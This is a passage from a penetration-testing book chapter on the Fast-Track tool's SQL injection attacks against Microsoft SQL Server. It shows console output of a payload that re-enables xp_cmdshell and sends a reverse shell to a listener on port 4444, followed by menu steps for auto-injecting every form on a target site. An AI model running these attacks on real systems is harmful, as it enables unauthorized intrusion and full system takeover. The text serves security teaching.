166
Chapter 11
Running cleanup before executing the payload...
Running the payload on the server...Sending initial request to enable
xp_cmdshell if disabled...
Sending first portion of payload (1/4)...
Sending second portion of payload (2/4)...
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Success! Full access was granted to the system, all through SQL injection.
Note that this attack will not succeed if parameterized SQL queries or
stored procedures are in use. Note, too, that the required configuration
for this attack is very minimal. After selecting
SQL Injector - Query String
Parameter Attack
from the menu of attacks, you simply direct Fast-Track to
the point of SQL injection . If the
xp_cmdshell
stored procedure is disabled,
Fast-Track will automatically re-enable it and attempt privilege escalation of
MS SQL.
SQL Injector—POST Parameter Attack
Fast-Track’s POST parameter attack requires even less configuration than
the preceding query string parameter attack. For this attack, simply pass Fast-
Track the URL of the website you want to attack, and it will automatically
detect the form to attack.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice:
2
This portion allows you to attack all forms on a specific website without having to specify
each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter
looking for both error based injection as well as blind based SQL injection. Simply type
the website you want to attack, and let it roll.
Example: http://www.sqlinjectablesite.com/index.aspx
Enter the URL to attack:
http://www.secmaniac.com
Forms detected...attacking the parameters in hopes of exploiting SQL Injection..